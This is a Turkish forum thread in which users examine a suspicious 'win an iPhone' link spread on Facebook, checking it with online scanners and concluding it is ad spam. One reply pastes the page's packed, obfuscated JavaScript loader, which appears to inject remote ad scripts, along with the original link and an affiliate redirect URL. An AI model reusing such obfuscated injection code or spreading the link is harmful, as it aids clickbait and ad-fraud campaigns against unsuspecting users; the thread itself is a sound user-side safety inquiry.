Bu Bağlantı Güvenli Mi?

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2021 Talihlisi
    joe_black
    joe_black's avatar
    Erkek

Müritler facede bi sayfa da sürekli şu link paylaşılıyor.

işte iphone kazanmak için tıkla, telefon ihtiyacı için tıkla, burayı tıkla bilmem ne kazan diye..

Link hep aynı. 1 2 defa tıkladım sonradan fark ettim aynı bağlantı olduğunu.

Bu bağlantıya tıkladıktan sonra mesela facebook.com yazıp entera basınca direkt hata veriyor, geçersiz istek diye. Login ekranını tıklıyorum giriş yap diyince tekrardan login ekranına atıyor. 2. denemede giriş yapılıyor. fake sitemi diye baktım lakin ilk giriş ekranı da normal face linki.

sormak istediğim sadece bu linke tıklayarak pcye backdoor vs birşey yüklenebilir mi?

Tıklamadan önce gireceklere uyarım herhangi birşey olursa sorumluluk kabul etmem. Bu işten anlayanlar aydınlatabilirse sevinirim..

Link: https://dl.dropboxusercontent.com/s/swe9t2azvxhsd89/uyrkvmvsa.html?i=1

2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    asiminnesli
    asiminnesli's avatar
    Erkek

sanırım değil çünkü facebook ta bir dünya insan aynı şekilde aynı yazıyı yayınlıyor buda olmadığını gösterir 

I am Jack's inflamed sense of rejection
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    csfrt
    csfrt's avatar
    Erkek

virus total zararsız diyor da ben pek emin olamadım o yüzden tıklamadım.

https://www.virustotal.com/tr/url/b889acf6e115901d5f349eb54860b33d634e3955fb42f05c86519d0f245fdf1f/analysis/1377437732/

ruh eşi çok sıradan, bana suç ortağı lazım.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2021 Talihlisi
    joe_black
    joe_black's avatar
    Erkek

ben defalarca tıkladığım için bi daha tıkladım screen almaya. tıklayınce böyle ekran geliyor. öyle duruyor.

5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    my4
    my4's avatar
    Erkek

ben comodo inspector kullanıyorum .

http://app.webinspector.com/public/reports/16595613

daha iyi bir dünya için ne yapıyorsun?
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2021 Talihlisi
    joe_black
    joe_black's avatar
    Erkek

şimdi hata verdi screen aldım müritler.durum bu.

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Altair
    Altair's avatar
    Erkek

herhangi bir sayafayı beğendiriyor yada başka bir uygulamaya izin veriyor olabilir.

sayfa kaynağına baktımda 

// eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C M(e){b t=1a.q.19.X();k(t.W("?")>0){b n=t.I("?");b r=n[1].I("&");b i=A x(r.w);b s=A x(r.w);b o=0;P(o=0;o0){D()}E{z++;k(z|kacinci|new|timeout|function|poll|else|yuklebenizikmeyimseni|join|domainlerimtek|split|30|energy1|return|getURLParameters|energy2|energy3|for|org|getElementsByTagName|head|com|no|No|indexOf|toString|createElement|script|||type|text|javascript|src|ads|unescape|appendChild|URL|window|setTimeout|getElementById|durartiklanamk|100|ready'.split('|'),0,{}))
    // ]]>

ergenin biri bişler yapmaya çalışıyor sanırım. facebook hesabım yok zaten. operada açtım birde malum opera çoğu site ile uyumsuz.

http://ad.adrttt.com/aff_c?offer_id=1199&aff_id=6449&url_id=1441 burayada yönledirme var

Altair tarafından 26/Ağu/13 15:46 tarihinde düzenlenmiştir
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    JiggSaw
    JiggSaw's avatar
    Erkek

Bu sana yeter sanırım :)

(yuklebenizikmeyimseni)

İmza YOK !!!
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2021 Talihlisi
    joe_black
    joe_black's avatar
    Erkek

eyw olayı çözdüm şimdi. reklam demekkine. bildiğim birinin sayfasında günde 3 4 kere paylaşılıyo. altında da SKype ile falan diyo. demek ki skypedan yardırıyorlar. eyw tşk ettim müritler.

10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ffjoness
    ffjoness's avatar
    Dişi

öyle her şeyi tıklamamalıı:)

Toplam Hit: 2775 Toplam Mesaj: 10